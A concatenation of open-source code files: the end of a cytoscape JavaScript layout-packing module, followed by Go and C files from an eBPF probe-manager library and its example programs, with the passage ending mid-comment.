this.DFSUtil(v, visited, adjListArray, newEles, elesOfComponent);
listOfComponents.push(elesOfComponent);
}
}
return listOfComponents;
};
instance.DFSUtil = function (v, visited, adjListArray, newEles, elesOfComponent) {
// Mark the current node as visited and print it
visited[v] = true;
elesOfComponent.push(newEles[v]);
// Recur for all the vertices
// adjacent to this vertex
for (var i = 0; i < adjListArray[v].length; i++) {
if (!visited[adjListArray[v][i]]) this.DFSUtil(adjListArray[v][i], visited, adjListArray, newEles, elesOfComponent);
}
};
instance.nodeWithOneNeighbor = function (mainEle, unplacedEle, allUnplacedEles) {
var quadrants = instance.checkOccupiedQuadrants(mainEle, unplacedEle, allUnplacedEles);
var freeQuadrants = [];
for (var property in quadrants) {
if (quadrants[property] === "free")
freeQuadrants.push(property);
}
//These take values 1 or -1 and are used to place the unplaced node in the chosen quadrant (see the quadrant sketch after checkOccupiedQuadrants)
var horizontalMult;
var verticalMult;
if (freeQuadrants.length > 0) {
if (freeQuadrants.length === 3) {
if (freeQuadrants.includes('first') && freeQuadrants.includes('second') && freeQuadrants.includes('third')) {
horizontalMult = -1;
verticalMult = -1;
}
else if (freeQuadrants.includes('first') && freeQuadrants.includes('second') && freeQuadrants.includes('fourth')) {
horizontalMult = 1;
verticalMult = -1;
}
else if (freeQuadrants.includes('first') && freeQuadrants.includes('third') && freeQuadrants.includes('fourth')) {
horizontalMult = 1;
verticalMult = 1;
}
else if (freeQuadrants.includes('second') && freeQuadrants.includes('third') && freeQuadrants.includes('fourth')) {
horizontalMult = -1;
verticalMult = 1;
}
}
else {
//Randomly picks one quadrant from the free quadrants
var randomQuadrant = freeQuadrants[Math.floor(Math.random() * freeQuadrants.length)];
if (randomQuadrant === "first") {
horizontalMult = 1;
verticalMult = -1;
}
else if (randomQuadrant === "second") {
horizontalMult = -1;
verticalMult = -1;
}
else if (randomQuadrant === "third") {
horizontalMult = -1;
verticalMult = 1;
}
else if (randomQuadrant === "fourth") {
horizontalMult = 1;
verticalMult = 1;
}
}
}
else {
horizontalMult = 0;
verticalMult = 0;
}
//Change the position of hidden elements
var horizontalParam = instance.generateRandom(options.idealEdgeLength - options.offset, options.idealEdgeLength + options.offset, horizontalMult);
var verticalParam = instance.generateRandom(options.idealEdgeLength - options.offset, options.idealEdgeLength + options.offset, verticalMult);
var newCenterX = mainEle.position("x") + horizontalParam;
var newCenterY = mainEle.position("y") + verticalParam;
unplacedEle.position("x", newCenterX);
unplacedEle.position("y", newCenterY);
};
instance.nodeWithMultipleNeighbors = function (ele, neighbors) {
if (neighbors == null) {
var neighbors = ele.neighborhood().nodes(":visible");
}
var x = 0;
var y = 0;
var count = 0;
neighbors.forEach(function (ele1) {
x += ele1.position("x");
y += ele1.position("y");
count++;
});
x = x / count;
y = y / count;
var diffx = instance.generateRandom(0, options.offset / 2, 0);
var diffy = instance.generateRandom(0, options.offset / 2, 0);
ele.position("x", x + diffx);
ele.position("y", y + diffy);
};
instance.generateRandom = function (min, max, mult) {
var val = [-1, 1];
if (mult === 0)
mult = val[Math.floor(Math.random() * val.length)];
return (Math.floor(Math.random() * (max - min + 1)) + min) * mult;
};
instance.checkOccupiedQuadrants = function (mainEle, unplacedEle, allUnplacedEles) {
var visibleEles = mainEle.neighborhood().difference(unplacedEle).difference(allUnplacedEles).nodes();
var occupiedQuadrants = { first: "free", second: "free", third: "free", fourth: "free" };
visibleEles.forEach(function (ele) {
if (ele.data('class') != 'compartment' && ele.data('class') != 'complex') {
if (ele.position("x") < mainEle.position("x") && ele.position("y") < mainEle.position("y"))
occupiedQuadrants.second = "occupied";
else if (ele.position("x") > mainEle.position("x") && ele.position("y") < mainEle.position("y"))
occupiedQuadrants.first = "occupied";
else if (ele.position("x") < mainEle.position("x") && ele.position("y") > mainEle.position("y"))
occupiedQuadrants.third = "occupied";
else if (ele.position("x") > mainEle.position("x") && ele.position("y") > mainEle.position("y"))
occupiedQuadrants.fourth = "occupied";
}
});
return occupiedQuadrants;
};
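/*
* Quadrant convention sketch (illustrative): quadrants are named relative to mainEle with the
* screen's y axis growing downwards, so "first" is up-right (x > main, y < main), "second" is
* up-left, "third" is down-left and "fourth" is down-right. For example, picking the "third"
* quadrant translates into horizontalMult = -1 and verticalMult = 1 in nodeWithOneNeighbor,
* which pushes the unplaced node to the lower left of mainEle.
*/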
/**
* @param { { nodes: any[] }[] } components
* @param { { dx: number, dy: number }[] } shifts
*/
function calculatePackingCenter(components, shifts) {
components.forEach((component, index) => {
component.nodes.forEach(node => {
node.x += shifts[index].dx;
node.y += shifts[index].dy;
});
});
return getCenter(components);
}
/**
* @param { any[] } components
*/
instance.packComponents = function (components, randomize = true) {
var spacingAmount = options.componentSpacing;
if(spacingAmount !== undefined) { // if spacingAmount is undefined, we expect this to be an incremental packing
if (randomize) {
spacingAmount = spacingAmount - 52; // subtract 52 to make it compatible with the incremental packing
}
spacingAmount = Math.max(1, spacingAmount); // incremental packing requires spacingAmount > 0
}
let currentCenter = generalUtils.getCenter(components);
var packingResult;
let mainGrid; // used in randomized packing
if (!randomize) {
packingResult = pose.packComponents(components, {
componentSpacing: spacingAmount
});
}
else {
var gridStep = 0;
var totalNodes = 0;
components.forEach(function (component) {
totalNodes += component.nodes.length;
component.nodes.forEach(function (node) {
gridStep += node.width + node.height;
});
});
gridStep = gridStep / (2 * totalNodes);
gridStep = Math.floor(gridStep * options.polyominoGridSizeFactor);
components.forEach(function (component) {
component.nodes.forEach(function (node) {
node.x = node.x - spacingAmount;
node.y = node.y - spacingAmount;
node.width = node.width + (2 * spacingAmount);
node.height = node.height + (2 * spacingAmount);
});
});
var gridWidth = 0, gridHeight = 0;
/** @type { Polyomino[] } */
var polyominos = [];
var globalX1 = Number.MAX_VALUE, globalX2 = -Number.MAX_VALUE, globalY1 = Number.MAX_VALUE, globalY2 = -Number.MAX_VALUE;
//create polyominos for components
components.forEach(function (component, index) {
var x1 = Number.MAX_VALUE, x2 = -Number.MAX_VALUE, y1 = Number.MAX_VALUE, y2 = -Number.MAX_VALUE;
component.nodes.forEach(function (node) {
if (node.x <= x1) x1 = node.x;
if (node.y <= y1) y1 = node.y;
if (node.x + node.width >= x2) x2 = node.x + node.width;
if (node.y + node.height >= y2) y2 = node.y + node.height;
});
component.edges.forEach(function (edge) {
if (edge.startX <= x1) x1 = edge.startX;
if (edge.startY <= y1) y1 = edge.startY;
if (edge.endX >= x2) x2 = edge.endX;
if (edge.endY >= y2) y2 = edge.endY;
});
if (x1 < globalX1) globalX1 = x1;
if (x2 > globalX2) globalX2 = x2;
if (y1 < globalY1) globalY1 = y1;
if (y2 > globalY2) globalY2 = y2;
let componentWidth = x2 - x1;
let componentHeight = y2 - y1;
gridWidth += componentWidth;
gridHeight += componentHeight;
var componentPolyomino = new polyominoPacking.Polyomino(x1, y1, componentWidth, componentHeight, gridStep, index);
//fill nodes to polyomino cells
component.nodes.forEach(function (node) {
//top left cell of a node
var topLeftX = Math.floor((node.x - x1) / gridStep);
var topLeftY = Math.floor((node.y - y1) / gridStep);
//bottom right cell of a node
var bottomRightX = Math.floor((node.x + node.width - x1) / gridStep);
var bottomRightY = Math.floor((node.y + node.height - y1) / gridStep);
//all cells between topleft cell and bottom right cell should be occupied
for (var i = topLeftX; i <= bottomRightX; i++) {
for (var j = topLeftY; j <= bottomRightY; j++) {
componentPolyomino.grid[i][j] = true;
}
}
});
//fill cells where edges pass
component.edges.forEach(function (edge) {
var p0 = {}, p1 = {};
p0.x = (edge.startX - x1) / gridStep;
p0.y = (edge.startY - y1) / gridStep;
p1.x = (edge.endX - x1) / gridStep;
p1.y = (edge.endY - y1) / gridStep;
//for every edge calculate the super cover
var points = generalUtils.LineSuperCover(p0, p1);
points.forEach(function (point) {
var indexX = Math.floor(point.x);
var indexY = Math.floor(point.y);
if (indexX >= 0 && indexX < componentPolyomino.stepWidth && indexY >= 0 && indexY < componentPolyomino.stepHeight) {
componentPolyomino.grid[Math.floor(point.x)][Math.floor(point.y)] = true;
}
});
});
//update number of occupied cells in polyomino
for (var i = 0; i < componentPolyomino.stepWidth; i++) {
for (var j = 0; j < componentPolyomino.stepHeight; j++) {
if (componentPolyomino.grid[i][j]) componentPolyomino.numberOfOccupiredCells++;
}
}
polyominos.push(componentPolyomino);
});
//order polyominos in non-increasing order of size
polyominos.sort(function (a, b) {
var aSize = a.stepWidth * a.stepHeight;
var bSize = b.stepWidth * b.stepHeight;
// a should come before b in the sorted order
if (aSize > bSize) {
return -1;
// a should come after b in the sorted order
} else if (aSize < bSize) {
return 1;
// a and b are the same
} else {
return 0;
}
});
//main grid width and height are two times the sum of all component widths and heights (worst case scenario)
//initialize the grid; one grid step is added to avoid insufficient grid space due to division by 2 in the calculations
mainGrid = new polyominoPacking.Grid((gridWidth * 2) + gridStep, (gridHeight * 2) + gridStep, gridStep);
//place first (biggest) polyomino in the center
mainGrid.placePolyomino(polyominos[0], mainGrid.center.x, mainGrid.center.y);
//for every polyomino, try placing it on the first ring of neighboring cells and calculate the utility; if no placement is found, expand to the second ring, and so on
for (var i = 1; i < polyominos.length; i++) {
var fullnessMax = 0;
var adjustedFullnessMax = 0;
var weigthFullnessAspectRatio = 0;
var minAspectRatioDiff = 1000000;
var placementFound = false;
var cells = [];
var resultLocation = {};
while (!placementFound) {
cells = mainGrid.getDirectNeighbors(cells, Math.ceil(Math.max(polyominos[i].stepWidth, polyominos[i].stepHeight) / 2));
cells.forEach(function (cell) {
if (mainGrid.tryPlacingPolyomino(polyominos[i], cell.x, cell.y)) {
placementFound = true;
var utilityValue = mainGrid.calculateUtilityOfPlacing(polyominos[i], cell.x, cell.y, options.desiredAspectRatio);
var cellChosen = false;
if (options.utilityFunction == 1) {
if (utilityValue.adjustedFullness > adjustedFullnessMax) {
cellChosen = true;
} else if (utilityValue.adjustedFullness == adjustedFullnessMax) {
if (utilityValue.fullness > fullnessMax) {
cellChosen = true;
} else if (utilityValue.fullness == fullnessMax) {
if (Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio) <= minAspectRatioDiff) {
cellChosen = true;
}
}
}
if (cellChosen) {
adjustedFullnessMax = utilityValue.adjustedFullness;
minAspectRatioDiff = Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio);
fullnessMax = utilityValue.fullness;
resultLocation.x = cell.x;
resultLocation.y = cell.y;
}
} else if (options.utilityFunction == 2) {
var aspectRatioDiff = Math.abs(utilityValue.actualAspectRatio - options.desiredAspectRatio);
var weightedUtility = (utilityValue.fullness * .5) + ((1 - aspectRatioDiff / Math.max(utilityValue.actualAspectRatio, options.desiredAspectRatio) * .5));
if (weightedUtility > weigthFullnessAspectRatio) {
weigthFullnessAspectRatio = weightedUtility;
resultLocation.x = cell.x;
resultLocation.y = cell.y;
}
}
}
});
}
mainGrid.placePolyomino(polyominos[i], resultLocation.x, resultLocation.y);
}
//sort polyominos according to their input index to return the output in the correct order
polyominos.sort(function (a, b) {
if (a.index < b.index) {
return -1;
} else if (a.index > b.index) {
return 1;
} else {
return 0;
}
});
packingResult = {
shifts: []
};
/* var shiftX = componentsCenter.x - ((mainGrid.center.x - mainGrid.occupiedRectangle.x1)*gridStep);
var shiftY = componentsCenter.y - ((mainGrid.center.y - mainGrid.occupiedRectangle.y1)*gridStep);
var occupiedCenterX = Math.floor((mainGrid.occupiedRectangle.x1 + mainGrid.occupiedRectangle.x2)/2);
var occupiedCenterY = Math.floor((mainGrid.occupiedRectangle.y1 + mainGrid.occupiedRectangle.y2)/2); */
polyominos.forEach(function (pol) {
var dx = (pol.location.x - pol.center.x - mainGrid.occupiedRectangle.x1) * gridStep - pol.x1;//+shiftX;
var dy = (pol.location.y - pol.center.y - mainGrid.occupiedRectangle.y1) * gridStep - pol.y1;// + shiftY;
//var dx = (pol.location.x -occupiedCenterX) * gridStep + componentsCenter.x- pol.leftMostCoord;//+shiftX;
//var dy = (pol.location.y -occupiedCenterY) * gridStep + componentsCenter.y-pol.topMostCoord;// + shiftY;
packingResult.shifts.push({ dx: dx, dy: dy });
});
}
// Calculate what would be the center of the packed layout
let packingCenter = calculatePackingCenter(components, packingResult.shifts);
// Calculate the necessary additional shift to re-center
let centerShift = packingCenter.diff(currentCenter);
// Add the center shift
for (let shift of packingResult.shifts) {
shift.dx += centerShift.x;
shift.dy += centerShift.y;
}
if (randomize) {
packingResult.aspectRatio = Math.round(((mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1) / (mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1)) * 1e2) / 1e2;
packingResult.fullness = Math.round(((mainGrid.numberOfOccupiredCells / ((mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1) * (mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1))) * 100) * 1e2) / 1e2;
if (packingResult.aspectRatio > options.desiredAspectRatio) {
var mainGridWidth = mainGrid.occupiedRectangle.x2 - mainGrid.occupiedRectangle.x1 + 1;
packingResult.adjustedFullness = Math.round((((mainGrid.numberOfOccupiredCells) / (mainGridWidth * (mainGridWidth / options.desiredAspectRatio)) * 100)) * 1e2) / 1e2;
// height = width / desiredAspectRatio;
} else {
var mainGridheight = mainGrid.occupiedRectangle.y2 - mainGrid.occupiedRectangle.y1 + 1;
packingResult.adjustedFullness = Math.round((((mainGrid.numberOfOccupiredCells) / ((mainGridheight * options.desiredAspectRatio) * mainGridheight)) * 100) * 1e2) / 1e2;
// width = height * desiredAspectRatio;
}
}
return packingResult;
};
return instance;
};
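// Usage sketch (hypothetical data and option values; in the bundled extension this factory is
// registered with cytoscape, but it is called directly here for illustration). Option names are
// the ones read elsewhere in this file.
/*
const instance = layoutUtilities(cy, { componentSpacing: 80, polyominoGridSizeFactor: 1,
  desiredAspectRatio: 1, utilityFunction: 1, offset: 20, idealEdgeLength: 50 });
const components = [
  { nodes: [{ x: 0, y: 0, width: 30, height: 30 }], edges: [] },
  { nodes: [{ x: 500, y: 500, width: 30, height: 30 }], edges: [] }
];
const result = instance.packComponents(components, true);
// result.shifts[i] = { dx, dy } to apply to every node of components[i];
// with randomize === true, result also reports aspectRatio, fullness and adjustedFullness.
*/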
module.exports = layoutUtilities;
| ahmethalac/cytoscape.js-layout-utilities |
<|start_filename|>manager/examples/programs/cgroup/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\x8c\x54\xbf\x6f\x13\x31\x14\xfe\x9c\x84\x34\xb4\x1d\x0a\x03\x2a\xa7\x0e" +
"\x27\x90\xba\x80\x4c\x8b\x10\x82\xad\x8a\x44\x58\x3a\x20\x54\x36\xa4\xe3\x7a\x71\x4b\x94\xe4\x12\x7c\x17\x7e\x05" +
"\x09\x31\xb0\x77\x61\x46\xfc\x07\x6c\x65\xe3\x5f\xe8\xc8\xc8\x88\xc4\x52\x24\x24\x36\x5c\x3d\xc7\x4e\x2c\xe7\x4e" +
"\xe9\x93\x1c\xbf\xf7\xd9\xef\xbd\xef\x7d\x72\xee\xfd\x83\xdd\x56\x85\x31\x58\x63\xf8\x87\x59\x34\xb3\x6f\x95\x99" +
"\xbf\x63\x7e\x57\xc1\x70\xcc\x80\x65\x00\xdd\xe0\xaf\x22\x94\x62\x29\xb2\x2c\x09\x4e\x75\xbc\xce\x80\x43\x39\x18" +
"\x91\x3f\x0c\xc5\xe1\x38\xf8\x35\xc5\xa5\x68\x87\xe4\x0f\xd2\x30\x19\x07\x3f\xa7\xb8\xc8\xc3\x84\xfc\x78\x98\x8f" +
"\xc6\xc1\x8f\x29\x9e\x8a\x57\xfa\xfe\x30\x4e\xba\xe3\xe0\x44\xe3\xdf\xbf\x4c\x38\x2d\x31\xe0\x44\x29\x75\x5c\x01" +
"\x36\x01\x7c\x04\x50\x27\x3e\x7a\x26\xe0\x93\xe1\x4e\x35\x28\x9f\x7a\x50\x7d\xe2\x40\xfd\x89\x23\xf1\x23\xee\xcb" +
"\x78\xf8\x68\x17\xc0\x7f\xa5\xd4\xe7\xdf\x0c\xeb\x9e\x16\x5a\x1f\xf7\xa0\xe6\xac\x06\x80\xb5\xd9\x5d\xeb\xb2\xb7" +
"\x8f\xd1\x78\xb7\xc2\x56\x69\x16\xb3\xac\x7d\x2d\xd0\xdb\xb7\x27\xba\xfc\x1f\x55\x74\x56\x45\x75\x0e\xbb\x01\xe0" +
"\x12\x2e\x4c\xe3\x9a\xd9\xaf\x69\xbc\x3e\x87\x37\x01\x5c\x76\xea\x58\x4e\x1b\xce\xcc\xfa\x09\xf0\x5c\xbc\xce\xc1" +
"\x9b\x7b\x2d\x4e\xce\x44\xb8\x28\xeb\xee\xdf\x9a\x88\x87\xe8\xa5\x90\x59\x67\x90\x22\xea\x75\x12\x91\x66\x02\x5c" +
"\x8a\x1e\x17\xcf\xa3\x03\x19\xf7\x85\xcd\x98\xdc\x8e\x0e\x46\x69\x82\x7e\xdc\x49\x79\x02\x9e\xe5\x32\x8f\xf7\xc1" +
"\xb3\x37\x7d\xbd\x37\xf7\x5a\xe0\x72\xd0\x8e\xf3\x98\xce\xb6\xf9\xf6\xdd\x73\x48\x75\x2e\x7b\xaa\x75\x9b\xb7\x2d" +
"\xf3\xce\x3f\x78\xb8\xff\x9f\x60\x66\xd5\x3d\x7c\xa7\xa4\x5f\xcd\x8b\xd7\x16\xe4\xfb\x6f\xa2\xe1\xc5\x2f\x4c\xfe" +
"\x6d\x0f\x3f\x35\xfb\x66\x41\x3f\x77\x8e\x9b\xc6\xf7\x35\xb8\xc2\x8a\xf9\xfa\xf3\x5f\x2f\xc9\xdf\x28\xc9\xf7\xe3" +
"\x5e\x41\x4d\xb2\xd0\x80\x57\x17\xf4\x5f\x2a\xc9\xbf\x6f\xc0\x70\x41\xfe\x3d\xf7\x4d\x3b\xf6\xcc\x5c\xdc\xf2\x70" +
"\x5f\xff\x3b\x00\x2e\x16\xf1\x37\x05\xad\xde\x2b\xe6\x9e\xcd\xb7\x78\xbb\xa0\x37\xd9\x91\xe9\x7f\xe4\xf0\xae\x3a" +
"\xf9\xf6\xbb\x71\x16\x00\x00\xff\xff\x40\x5f\x6c\xa0\xb8\x05\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 1464,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594295090, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>manager/syscalls.go<|end_filename|>
package manager
import (
"github.com/DataDog/ebpf"
"golang.org/x/sys/unix"
"syscall"
"unsafe"
"github.com/pkg/errors"
"github.com/DataDog/ebpf/internal"
)
func perfEventOpenTracepoint(id int, progFd int) (*internal.FD, error) {
attr := unix.PerfEventAttr{
Type: unix.PERF_TYPE_TRACEPOINT,
Sample_type: unix.PERF_SAMPLE_RAW,
Sample: 1,
Wakeup: 1,
Config: uint64(id),
}
attr.Size = uint32(unsafe.Sizeof(attr))
efd, err := unix.PerfEventOpen(&attr, -1, 0, -1, unix.PERF_FLAG_FD_CLOEXEC)
if efd < 0 {
return nil, errors.Wrap(err, "perf_event_open error")
}
if _, _, err := unix.Syscall(unix.SYS_IOCTL, uintptr(efd), unix.PERF_EVENT_IOC_ENABLE, 0); err != 0 {
return nil, errors.Wrap(err, "error enabling perf event")
}
if _, _, err := unix.Syscall(unix.SYS_IOCTL, uintptr(efd), unix.PERF_EVENT_IOC_SET_BPF, uintptr(progFd)); err != 0 {
return nil, errors.Wrap(err, "error attaching bpf program to perf event")
}
return internal.NewFD(uint32(efd)), nil
}
type bpfProgAttachAttr struct {
targetFD uint32
attachBpfFD uint32
attachType uint32
attachFlags uint32
}
const (
_ProgAttach = 8
_ProgDetach = 9
)
func bpfProgAttach(progFd int, targetFd int, attachType ebpf.AttachType) (int, error) {
attr := bpfProgAttachAttr{
targetFD: uint32(targetFd),
attachBpfFD: uint32(progFd),
attachType: uint32(attachType),
}
ptr, err := internal.BPF(_ProgAttach, unsafe.Pointer(&attr), unsafe.Sizeof(attr))
if err != nil {
return -1, errors.Wrapf(err, "can't attach program id %d to target fd %d", progFd, targetFd)
}
return int(ptr), nil
}
func bpfProgDetach(progFd int, targetFd int, attachType ebpf.AttachType) (int, error) {
attr := bpfProgAttachAttr{
targetFD: uint32(targetFd),
attachBpfFD: uint32(progFd),
attachType: uint32(attachType),
}
ptr, err := internal.BPF(_ProgDetach, unsafe.Pointer(&attr), unsafe.Sizeof(attr))
if err != nil {
return -1, errors.Wrapf(err, "can't detach program id %d to target fd %d", progFd, targetFd)
}
return int(ptr), nil
}
func sockAttach(sockFd int, progFd int) error {
return syscall.SetsockoptInt(sockFd, syscall.SOL_SOCKET, unix.SO_ATTACH_BPF, progFd)
}
func sockDetach(sockFd int, progFd int) error {
return syscall.SetsockoptInt(sockFd, syscall.SOL_SOCKET, unix.SO_DETACH_BPF, progFd)
}
<|start_filename|>manager/examples/programs/socket/utils.go<|end_filename|>
package main
import (
"bytes"
"io"
"syscall"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Send a message through the socket pair to trigger the probe
func trigger(sockPair SocketPair) error {
logrus.Println("Sending a message through the socket pair to trigger the probes ...")
_, err := syscall.Write(sockPair[1], nil)
if err != nil {
return err
}
_, err = syscall.Read(sockPair[0], nil)
return err
}
type SocketPair [2]int
func (p SocketPair) Close() error {
err1 := syscall.Close(p[0])
err2 := syscall.Close(p[1])
if err1 != nil {
return err1
}
return err2
}
// newSocketPair - Create a socket pair
func newSocketPair() (SocketPair, error) {
return syscall.Socketpair(syscall.AF_UNIX, syscall.SOCK_DGRAM, 0)
}
<|start_filename|>manager/examples/object_pinning/main.go<|end_filename|>
package main
import (
"flag"
"github.com/sirupsen/logrus"
"github.com/DataDog/ebpf/manager"
)
var m = &manager.Manager{
Probes: []*manager.Probe{
&manager.Probe{
Section: "kprobe/mkdirat",
PinPath: "/sys/fs/bpf/mkdirat",
SyscallFuncName: "mkdirat",
},
&manager.Probe{
Section: "kretprobe/mkdirat",
SyscallFuncName: "mkdirat",
},
&manager.Probe{
Section: "kprobe/mkdir",
PinPath: "/sys/fs/bpf/mkdir",
SyscallFuncName: "mkdir",
},
&manager.Probe{
Section: "kretprobe/mkdir",
SyscallFuncName: "mkdir",
},
},
Maps: []*manager.Map{
&manager.Map{
Name: "map1",
MapOptions: manager.MapOptions{
PinPath: "/sys/fs/bpf/map1",
},
},
},
}
func main() {
// Parse CLI arguments
var kill bool
flag.BoolVar(&kill, "kill", false, "kills the programs suddenly before doing any cleanup")
flag.Parse()
logrus.Println("if they exist, pinned object will be automatically loaded")
// Initialize the manager
if err := m.Init(recoverAssets()); err != nil {
logrus.Fatal(err)
}
// Start the manager
if err := m.Start(); err != nil {
logrus.Fatal(err)
}
logrus.Println("successfully started, head over to /sys/kernel/debug/tracing/trace_pipe")
// Create a folder to trigger the probes
if err := trigger(); err != nil {
logrus.Error(err)
}
if kill {
logrus.Println("=> Stopping the program without cleanup, the pinned map and programs should show up in /sys/fs/bpf/")
logrus.Println("=> Restart without --kill to load the pinned object from the bpf file system and properly remove them")
return
}
// Close the manager
if err := m.Stop(manager.CleanAll); err != nil {
logrus.Fatal(err)
}
}
<|start_filename|>manager/examples/programs/tracepoint/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("tracepoint/syscalls/sys_enter_mkdirat")
int tracepoint_sys_enter_mkdirat(void *ctx)
{
bpf_printk("mkdirat enter (tracepoint)\n");
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/programs/kprobe/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_helpers.h"
SEC("kprobe/vfs_mkdir")
int kprobe_vfs_mkdir(void *ctx)
{
bpf_printk("mkdir (vfs hook point)\n");
return 0;
};
SEC("kprobe/utimes_common")
int kprobe_utimes_common(void *ctx)
{
bpf_printk("utimes_common\n");
return 0;
};
SEC("kretprobe/mkdirat")
int kretprobe_mkdirat(void *ctx)
{
bpf_printk("mkdirat return (syscall hook point)\n");
return 0;
}
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/map_rewrite_vs_map_router/ebpf/prog2.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
// shared_cache1 - This map will be shared with another Manager
struct bpf_map_def SEC("maps/shared_cache1") shared_cache1 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
/**
* routed_cache is used to define the types of maps that are expected in maps_router
